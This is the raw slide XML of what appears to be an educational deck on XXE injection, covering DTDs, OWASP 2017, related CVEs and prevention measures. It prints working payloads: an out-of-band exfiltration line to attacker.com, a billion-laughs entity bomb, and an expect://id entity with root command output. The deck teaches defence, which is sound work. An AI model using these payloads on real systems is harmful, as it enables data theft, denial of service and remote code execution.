            <a:ext cx="368100" cy="321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Disclosure- Out of Band</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="493" name="Google Shape;493;p39"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3551650" y="1597875"/>
            <a:ext cx="24213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&amp;name;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94" name="Google Shape;494;p39"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2153725" y="2675425"/>
            <a:ext cx="46551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http://attacker.com?collect=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>contents-of-file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95" name="Google Shape;495;p39"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3371025" y="3752975"/>
            <a:ext cx="16587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goodies.txt</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="496" name="Google Shape;496;p39"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3846000" y="2140350"/>
            <a:ext cx="6600" cy="428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7" name="Google Shape;497;p39"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4013150" y="3103500"/>
            <a:ext cx="568500" cy="67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0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1330550" y="5985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Side Request Forgery</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="503" name="Google Shape;5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450" y="3805800"/>
            <a:ext cx="9993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4055" y="1999175"/>
            <a:ext cx="787550" cy="12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680" y="1999175"/>
            <a:ext cx="787550" cy="1213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Google Shape;506;p40"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="4768925" y="3116800"/>
            <a:ext cx="996600" cy="85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7" name="Google Shape;507;p40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5009725" y="3371100"/>
            <a:ext cx="441600" cy="434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8" name="Google Shape;508;p40"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="507" idx="1"/>
            <a:endCxn id="507" idx="5"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5074396" y="3434760"/>
            <a:ext cx="312300" cy="307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9" name="Google Shape;509;p40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1966425" y="1632000"/>
            <a:ext cx="5217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510" name="Google Shape;510;p40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6240425" y="1632000"/>
            <a:ext cx="5217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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="511" name="Google Shape;511;p40"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="2648750" y="3283975"/>
            <a:ext cx="775800" cy="76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2" name="Google Shape;512;p40"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2949650" y="2501525"/>
            <a:ext cx="2688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this XML payload do?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="518" name="Google Shape;518;p41"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1303800" y="1336950"/>
            <a:ext cx="7030500" cy="3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&lt;?xml version=”1.0”?&gt;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&lt;!DOCTYPE lolz [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&lt;!ENTITY lol "lol"&gt;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&lt;!ELEMENT lolz (#PCDATA)&gt;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&lt;!ENTITY lol1 "&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;"&gt;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lol2 "&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;”&gt;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lol3 "&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;”&gt;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lol4 "&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;”&gt;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lol5 "&amp;lol4;&amp;lol4;&amp;lol4;&amp;lol4;&amp;lol4;”&gt;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lol6 "&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;”&gt;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lol7 "&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;”&gt;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lol8 "&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;”&gt;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]&gt;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&lt;creds&gt;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&lt;user&gt;&amp;lol8;&lt;/user&gt;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&lt;pass&gt;mypass&lt;/pass&gt;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&lt;/creds&gt;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</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="293" name="Google Shape;293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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000"/>
              <a:t>tensible Markup Language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format for encoding documents that is human and machine readable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Stores information as nested key:objects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Code Execution</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="524" name="Google Shape;524;p42"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1303800" y="1336950"/>
            <a:ext cx="7030500" cy="23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&lt;?xml version=”1.0”?&gt;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&lt;!DOCTYPE creds [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&lt;!ELEMENT creds ANY &gt;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&lt;!ENTITY name SYSTEM “expect://id”&gt;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]&gt;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&lt;creds&gt;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&lt;user&gt;&amp;name;&lt;/user&gt;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&lt;pass&gt;mypass&lt;/pass&gt;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&lt;/creds&gt;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5" name="Google Shape;525;p42"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371150" y="3839225"/>
            <a:ext cx="70833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You have logged in as user uid=0(root) gid=0(root) groups=0(root)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Impact</a:t>
            </a:r>
            <a:endParaRPr sz="4800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="531" name="Google Shape;5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450" y="1888400"/>
            <a:ext cx="3406001" cy="1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000" y="1597875"/>
            <a:ext cx="24098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2450" y="3348675"/>
            <a:ext cx="179070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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4075975" y="3925050"/>
            <a:ext cx="4158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https://www.cvedetails.com/cve/CVE-2016-9318/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Impact</a:t>
            </a:r>
            <a:endParaRPr sz="4800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="540" name="Google Shape;5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689550"/>
            <a:ext cx="3880426" cy="19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4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1541975" y="4460575"/>
            <a:ext cx="3062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Exposed and patched in 2015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4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1627275" y="3840775"/>
            <a:ext cx="6762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https://legalhackers.com/advisories/Google-AdWords-API-libraries-XXE-Injection-Vulnerability.html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Impact</a:t>
            </a:r>
            <a:endParaRPr sz="4800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="548" name="Google Shape;54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25" y="1814975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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1606675" y="4265050"/>
            <a:ext cx="42594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https://www.cvedetails.com/cve/CVE-2018-1905/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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4237725" y="1895750"/>
            <a:ext cx="44613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IBM WebSphere Application Server 9.0.0.0 through 9.0.0.9 is vulnerable to a XML External Entity Injection (XXE) attack when processing XML data.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remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources.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CVE</a:t>
            </a:r>
            <a:endParaRPr sz="4800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="556" name="Google Shape;556;p46"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1303800" y="1864025"/>
            <a:ext cx="53169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https://www.cvedetails.com/cve/CVE-2016-9318/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(6.8)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https://www.cvedetails.com/cve/CVE-2016-9598/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(4.3)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https://www.cvedetails.com/cve/CVE-2017-7375/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(7.5)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https://www.cvedetails.com/cve/CVE-2016-4449/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(5.8)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https://www.cvedetails.com/cve/CVE-2018-11586/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(7.5)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https://www.cvedetails.com/cve/CVE-2017-11457/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(4.0)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https://www.cvedetails.com/cve/CVE-2015-7241/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(7.5)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https://www.cvedetails.com/cve/CVE-2018-1905/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(5.5)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OWASP 2017</a:t>
            </a:r>
            <a:endParaRPr sz="4800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="562" name="Google Shape;562;p47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1466550" y="2264450"/>
            <a:ext cx="55317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XML External Entities (XXE) is a new category primarily supported by source code analysis security testing tools (SAST) data sets.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675" y="427888"/>
            <a:ext cx="1844851" cy="13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OWASP 2017</a:t>
            </a:r>
            <a:endParaRPr sz="4800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="569" name="Google Shape;56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675" y="427888"/>
            <a:ext cx="1844851" cy="13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800" y="1768575"/>
            <a:ext cx="5217549" cy="8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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1303800" y="3160950"/>
            <a:ext cx="62109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Exploitability varies between apps (level of sensitivity)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Attacks can be made against an XML parser, if there is an opportunity to include bad content in an XML document, targeting vulnerable code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OWASP 2017</a:t>
            </a:r>
            <a:endParaRPr sz="4800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="577" name="Google Shape;57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675" y="427888"/>
            <a:ext cx="1844851" cy="13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800" y="1768575"/>
            <a:ext cx="490537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9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1303800" y="3179225"/>
            <a:ext cx="73446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Many older XML processors have external entities enabled.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SAST tools (Source Code Analysis Tools) can locate these issues. </a:t>
            </a:r>
            <a:r>
              <a:rPr b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(internal scanning)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DAST tools (Dynamic Application Security Testing tools) require additional steps </a:t>
            </a:r>
            <a:r>
              <a:rPr b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(external scanning)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Security Testers need to be trained to test for XXE (not common as of 2017)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OWASP 2017</a:t>
            </a:r>
            <a:endParaRPr sz="4800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="585" name="Google Shape;58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675" y="427888"/>
            <a:ext cx="1844851" cy="134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0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1303800" y="2856150"/>
            <a:ext cx="3853200" cy="20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Lack of XXE protection can allow attackers to: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extract data (File disclosure / OOB attack)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execute request from server (SSRF)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Scan internal systems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DoS (billion laughs / Quadratic Blowup)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Business impact is dependent on specific details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(protection needs, data sensitivity)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800" y="1768563"/>
            <a:ext cx="50673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0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5584925" y="2990250"/>
            <a:ext cx="3000000" cy="21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Gartner's IT glossary, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en" sz="1100"/>
              <a:t>“it has become the standard for business-to-business transactions, electronic-data interchanges and Web services.”</a:t>
            </a:r>
            <a:endParaRPr b="1" i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Read more at:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:hlinkClick r:id="rId5"/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https://www.htbridge.com/blog/XXE-XML-injection.html</a:t>
            </a:r>
            <a:endParaRPr sz="1100" u="sng">
              <a:solidFill>
                <a:schemeClr val="hlink"/>
              </a:solidFill>
              <a:hlinkClick r:id="rId7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Copyright © High-Tech Bridge</a:t>
            </a:r>
            <a:endParaRPr sz="1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Prevention</a:t>
            </a:r>
            <a:endParaRPr sz="4800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="594" name="Google Shape;594;p51"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1303800" y="1828075"/>
            <a:ext cx="7030500" cy="30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Developer training</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p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simpler formats (i.e. JSON [has its own problems])</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p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Update and Patch libraries that process XML</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p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Disable External Entities</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL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95" name="Google Shape;5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065" y="1660848"/>
            <a:ext cx="858783" cy="8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2674" y="2220599"/>
            <a:ext cx="999300" cy="9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1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8224161" y="1801325"/>
            <a:ext cx="608400" cy="905100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw rotWithShape="0" algn="bl" dir="3480000" dist="285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7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Google Shape;59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8875" y="3317550"/>
            <a:ext cx="858775" cy="8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1"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="18353" r="15315" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4660375" y="4078475"/>
            <a:ext cx="1083437" cy="8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51"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4494600" y="3880100"/>
            <a:ext cx="648900" cy="6489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example</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="299" name="Google Shape;299;p16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1405975" y="1412100"/>
            <a:ext cx="4677600" cy="3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&lt;?xml version="1.0" encoding="UTF-8"?&gt;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&lt;zoo&gt;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&lt;animal&gt;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&lt;species&gt;Chimpanzee&lt;/species&gt;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&lt;name&gt;Caesar&lt;/name&gt;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&lt;/animal&gt;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&lt;animal&gt;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&lt;species&gt;Crocodile&lt;/species&gt;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&lt;name&gt;Rex&lt;/name&gt;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&lt;/animal&gt;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&lt;/zoo&gt;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highlight>
                <a:srgbClr val="CFE2F3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Prevention</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="4800"/>
              <a:t> cont’</a:t>
            </a:r>
            <a:endParaRPr sz="4800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="606" name="Google Shape;606;p52"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1303800" y="1837650"/>
            <a:ext cx="7030500" cy="30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Disable DTD processing (how to ensure format?)</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p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Implement client-side and server-side whitelisting</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p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Validate XML using XSD (DTD alternative)</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="-3429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SAST tools and manual code review</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL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07" name="Google Shape;60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475" y="4200375"/>
            <a:ext cx="822675" cy="8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550" y="3277400"/>
            <a:ext cx="776850" cy="7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7173" y="2570223"/>
            <a:ext cx="744675" cy="7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6875" y="1648925"/>
            <a:ext cx="699725" cy="6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2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7221975" y="1445475"/>
            <a:ext cx="648900" cy="6489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CIAa</a:t>
            </a:r>
            <a:endParaRPr sz="4800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="617" name="Google Shape;617;p53"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1303800" y="1990050"/>
            <a:ext cx="7030500" cy="21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Confidentiality?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Integrity?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Availability?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Authenticity?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CIAa</a:t>
            </a:r>
            <a:endParaRPr sz="4800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="623" name="Google Shape;623;p54"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1303800" y="1761450"/>
            <a:ext cx="7030500" cy="30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en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Confidentiality?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800"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File Disclosure, Injections (XSS)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en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Integrity?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800"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Injections (Escalation)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Remote Code Execution (expect module)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en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Availability?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800"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Billion Laughs, Injections (Malformation)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en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Authenticity?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800"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Server Side Request Forgery</a:t>
            </a:r>
            <a:endParaRPr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References</a:t>
            </a:r>
            <a:endParaRPr sz="4800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="629" name="Google Shape;629;p55"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1303800" y="1664400"/>
            <a:ext cx="7030500" cy="3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https://snyk.io/blog/nokogiri-xxe-vulnerabilities/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https://legalhackers.com/advisories/Google-AdWords-API-libraries-XXE-Injection-Vulnerability.html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http://www-01.ibm.com/support/docview.wss?uid=ibm10738721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https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing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https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Prevention_Cheat_Sheet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https://www.owasp.org/index.php/Top_10-2017_A4-XML_External_Entities_(XXE)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https://www.htbridge.com/blog/XXE-XML-injection.html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10"/>
              </a:rPr>
              <a:t>https://www.owasp.org/index.php/Testing_for_XML_Injection_(OTG-INPVAL-008)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</a:t>
            </a:r>
            <a:endParaRPr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1303800" y="1913850"/>
            <a:ext cx="7030500" cy="27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Well formed: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Adheres to the XML syntax rules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Ex. content is delimited by a start and end tag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Ex. Tags are properly nested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Valid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document conforms to some schema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document is also well-formed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usages</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="311" name="Google Shape;311;p1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Separating Data from Presentation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Makes data presentation intuitive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Search Engine Optimization / Metadata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Temporary Databases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Intra/inter-application communication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Parsers</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="317" name="Google Shape;317;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1236900" y="1421525"/>
            <a:ext cx="7030500" cy="3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Reads an XML doc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Identifies all the pieces of the document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Makes them available in memory to other programs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Checks for well-formedness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Can check for validity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Text enclosed by a CDATA tag will be interpreted by the parser as simple character data, not XML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Type Declaration (DTD)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="323" name="Google Shape;323;p20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1190100" y="1958550"/>
            <a:ext cx="7030500" cy="24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Defines the structure of an XML document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kind of elements it can have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properties these elements hold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be declared inside an XML doc (internal subset) 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be referenced from another file (external subset)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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1252900" y="2313850"/>
            <a:ext cx="4209300" cy="226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DTD</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="330" name="Google Shape;330;p21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1417000" y="2438800"/>
            <a:ext cx="46776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&lt;!ELEMENT animal (species,name)&gt;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&lt;!ELEMENT species (#PCDATA)&gt;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&lt;!ELEMENT name (#PCDATA)&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="160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1295500" y="1401375"/>
            <a:ext cx="49206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600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!DOCTYPE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="16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note SYSTEM "filename.dtd"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600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2" name="Google Shape;332;p21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5819850" y="3020150"/>
            <a:ext cx="1905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filename.dtd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